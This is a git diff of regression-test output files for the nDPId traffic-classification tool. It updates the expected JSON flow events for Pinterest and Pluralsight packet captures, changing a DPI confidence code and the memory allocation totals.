-00747{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":171,"flow_first_seen":1605289715782,"flow_last_seen":1605289724655,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12420,"flow_tot_l4_payload_len":150127,"flow_avg_l4_payload_len":877,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2804,"flow_first_seen":1605289713743,"flow_last_seen":1605289734948,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13624,"flow_tot_l4_payload_len":3671715,"flow_avg_l4_payload_len":1309,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} -00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1605289714658,"flow_last_seen":1605289714873,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":7307,"flow_avg_l4_payload_len":221,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} 
+00747{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":171,"flow_first_seen":1605289715782,"flow_last_seen":1605289724655,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12420,"flow_tot_l4_payload_len":150127,"flow_avg_l4_payload_len":877,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2804,"flow_first_seen":1605289713743,"flow_last_seen":1605289734948,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13624,"flow_tot_l4_payload_len":3671715,"flow_avg_l4_payload_len":1309,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} 
+00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1605289714658,"flow_last_seen":1605289714873,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":7307,"flow_avg_l4_payload_len":221,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} 00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1605289714590,"flow_last_seen":1605289716476,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":38980,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
+00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1605289714590,"flow_last_seen":1605289716476,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":38980,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":48890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":48890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::200a","src_port":57130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} @@ -247,9 +247,9 @@ ~~ total active/idle flows...: 37/37 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 7404844 bytes -~~ total memory freed........: 7404844 bytes -~~ total allocations/frees...: 137110/137110 +~~ total memory allocated....: 7538478 bytes +~~ total memory freed........: 7538478 bytes +~~ total allocations/frees...: 139872/139872 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 3224 chars diff --git a/test/results/pluralsight.pcap.out b/test/results/pluralsight.pcap.out index 39ac71f0e..0dcd72f1f 100644 
--- a/test/results/pluralsight.pcap.out +++ b/test/results/pluralsight.pcap.out 
@@ -4,48 +4,48 @@ 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1648373355763,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373355763,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8t1dAAEAGzuTAqAGANkW8EqaSAbs5mmmUAAAAAKAC+vDIPgAAAgQFtAQCCAqK+PnbAAAAAAEDAwc="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1648373355952,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373355952,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAAOAG5js2RbwSwKgBgAG7ppJ9QO7SOZpplaASaN998gAAAgQFtAQCCApSMR4Hivj52wEDAwg="} 01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1648373355952,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1648373355952,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5t1lAAEAGzOXAqAGANkW8EqaSAbs5mmmVfUDu04AYAfbrKAAAAQEICor4+pdSMR4HFgMBAgABAAH8AwM1jCFDKADpkwCWNDdgH\/adXVGzDgYuQsQMuim+6yCdjCAuElAWaAcNbYd22pDJpusrU2oMuj5gm\/t2Aky6e512VAAgamoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTSkoAAAAAABQAEgAAD3BsdXJhbHNpZ2h0LmNvbQAXAAD\/AQABAAAKAAoACCoqAB0AFwAYAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAANABIAEAQDCAQEAQUDCAUFAQgGBgEAEgAAADMAKwApKioAAQAAHQAgy0tnman9YKIJBU2tFJ\/X+H4+8C285s8hNvU9rt60YmAALQACAQEAKwAHBgoKAwQDAwAbAAMCAAJEaQAFAAMCaDJqagABAAAVAMgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373355763,"flow_last_seen":1648373355952,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373355952,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373355763,"flow_last_seen":1648373356139,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1648373356139,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1648373355763,"flow_last_seen":1648373356139,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6107,"flow_avg_l4_payload_len":872,"midstream":0,"thread_ts_msec":1648373356139,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.com","server_names":"*.pluralsight.com,pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.pluralsight.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"31:0B:3D:03:7A:6A:F8:86:8F:CE:62:30:E9:A2:F1:47:E5:6C:3D:F7"}} 
+00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373355763,"flow_last_seen":1648373355952,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373355952,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373355763,"flow_last_seen":1648373356139,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1648373356139,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} 
+01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1648373355763,"flow_last_seen":1648373356139,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6107,"flow_avg_l4_payload_len":872,"midstream":0,"thread_ts_msec":1648373356139,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.com","server_names":"*.pluralsight.com,pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.pluralsight.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"31:0B:3D:03:7A:6A:F8:86:8F:CE:62:30:E9:A2:F1:47:E5:6C:3D:F7"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373357854,"flow_last_seen":1648373357854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373357854,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1648373357854,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373357854,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8tRVAAEAG8mLAqAGAkks+0KceAbt\/83TdAAAAAKAC+vCjygAAAgQFtAQCCAquLcooAAAAAAEDAwc="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373357861,"flow_last_seen":1648373357861,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373357861,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1648373357861,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373357861,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA85z1AAEAGwDrAqAGAkks+0KcmAbuYBq2TAAAAAKAC+vBS8wAAAgQFtAQCCAquLcouAAAAAAEDAwc="} 
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1648373357870,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373357870,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGrniSSz7QwKgBgAG7px6MpPZof\/N03qAS\/\/\/QggAAAgQFTAQCCApC6QiXri3KKAEDAwk="} 01170{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1648373357870,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1648373357870,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5tRdAAEAG8GPAqAGAkks+0KceAbt\/83TejKT2aYAYAfY+HwAAAQEICq4tyjdC6QiXFgMBAgABAAH8AwNByQDZoxI4dOK0Sqz8YqFtpt\/EgjJNogy+qC4qHtET5yBBjqjV\/zD\/ZZYcaXw3kK2L11Av5ASkLtB9CBYWZu3HRgAg2toTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTGhoAAAAAABsAGQAAFnBsdXJhbHNpZ2h0Mi5pbWdpeC5uZXQAFwAA\/wEAAQAACgAKAAh6egAdABcAGAALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAADQASABAEAwgEBAEFAwgFBQEIBgYBABIAAAAzACsAKXp6AAEAAB0AICyryrnXcbLoAjfLxc89+emszCPBlJNQz9WtPrwFSKZoAC0AAgEBACsABwZ6egMEAwMAGwADAgACRGkABQADAmgySkoAAQAAFQDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
-00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373357854,"flow_last_seen":1648373357870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373357870,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight2.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373357854,"flow_last_seen":1648373357870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373357870,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight2.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1648373357879,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373357879,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGrniSSz7QwKgBgAG7pyYtR\/VLmAatlKAS\/\/8fEgAAAgQFTAQCCAr1hBcPri3KLgEDAwk="} 